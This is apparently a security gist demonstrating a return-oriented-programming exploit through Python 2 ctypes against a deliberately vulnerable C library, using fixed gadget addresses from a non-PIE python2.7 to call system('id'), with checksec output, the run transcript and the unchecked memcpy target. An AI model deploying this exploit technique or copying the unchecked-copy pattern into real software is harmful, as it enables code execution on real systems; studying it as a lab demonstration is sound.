Python ctypes exploitation example that relies on the python2.7 binary not being compiled with -fPIE
# Proof of concept for the gist's point: /usr/bin/python2.7 on this box is
# built without PIE (see the checksec output in the transcript), so even with
# ASLR enabled the interpreter's own code is mapped at a fixed address and
# offers stable ROP gadgets to any stack overflow reachable through ctypes.
# Target: pwnme() in libpwn.so, which memcpy()s a caller-supplied length into
# a 128-byte stack buffer with no bounds check and no stack canary.
# Python 2 only: the str literals below are byte strings, and every address is
# specific to the python2.7 build shown in the transcript.
from ctypes import *

libName = './libpwn.so'
libpwn = CDLL(libName)  # loads the deliberately vulnerable library from the current directory

payload = "A"*136  # buffer overflow: fills buf[128] plus, presumably, the 8-byte saved rbp, reaching the return address
payload += "\xd4\x8a\x41\x00\x00\x00\x00\x00"  # 0x0000000000418ad4 ; pop rdi; ret ;; from /usr/bin/python2.7 ; thanks https://github.com/JonathanSalwan/ROPgadget
payload += "\x19\xcb\x40\x00\x00\x00\x00\x00"  # 40cb19 # "id\x00" from "setresgi\x00" -- the value popped into rdi
payload += '\x30\x68\x41\x00\x00\x00\x00\x00'  # 0000000000416830 ; system@plt from /usr/bin/python2.7
# The corrupted return address is consumed when pwnme() returns into the
# interpreter, which is why the transcript shows the command output followed by
# a segfault (nothing restores a sane frame afterwards). Mitigations shown by
# the page itself: build the interpreter as PIE (-fPIE -pie) so these addresses
# change per run, and keep the stack protector and a length check in the library.
print libpwn.pwnme(create_string_buffer(payload, len(payload)), len(payload))
$ uname -a # Ubuntu 14.04 x86_64 | |
Linux ubuntu 3.13.0-43-generic #72-Ubuntu SMP Mon Dec 8 19:35:06 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux | |
$ cat /proc/sys/kernel/randomize_va_space # yes, aslr is on | |
2 | |
$ bash checksec.sh --file /usr/bin/python2.7 # from http://trapkit.de/tools/checksec.sh | |
RELRO STACK CANARY NX PIE RPATH RUNPATH FILE | |
Partial RELRO Canary found NX enabled No PIE No RPATH No RUNPATH /usr/bin/python2.7 | |
$ gcc -std=c11 -Wall -fPIC -fPIE -Wl,-z,relro,-z,now -fno-stack-protector -shared -o libpwn.so pwn.c # ok, i cheated, stack cookies are disabled to make this easier | |
$ bash checksec.sh --file libpwn.so | |
RELRO STACK CANARY NX PIE RPATH RUNPATH FILE | |
Full RELRO No canary found NX enabled DSO No RPATH No RUNPATH libpwn.so | |
$ python ex.py | |
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAԊA | |
uid=1000(jtd) gid=1000(jtd) groups=1000(jtd),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),124(sambashare) | |
[1] 68603 segmentation fault (core dumped) python ex.py |
#include <stdio.h> | |
#include <string.h> | |
#include <signal.h> | |
/*
 * Deliberately vulnerable target for the accompanying ctypes PoC (ex.py).
 *
 * str: caller-supplied bytes (the ctypes buffer built by the script).
 * len: number of bytes to copy. It is never compared against sizeof buf, so
 *      any len > 128 overwrites the saved frame pointer and return address
 *      above buf on the stack (the transcript's 136-byte padding + address
 *      layout). len is a signed int: a negative value converts to a huge
 *      size_t inside memcpy().
 * Returns the constant 4 -- only reached if the return address survived.
 *
 * A hardened version would reject len > sizeof buf (or copy at most
 * sizeof buf - 1 bytes) and guarantee a terminating NUL before puts().
 * The gist compiles this library with -fno-stack-protector on purpose, so no
 * canary detects the overwrite either.
 */
int pwnme(char* str, int len) {
    char buf[128] = {0};    /* zero-filled, so a short copy is NUL-terminated for puts() */
    memcpy(buf, str, len);  /* unchecked: len is taken straight from the caller */
    puts(buf);              /* for len >= 128 buf holds no NUL; puts() reads on into the overwritten frame (see the stray bytes after the A's in the transcript) */
    return 4;
}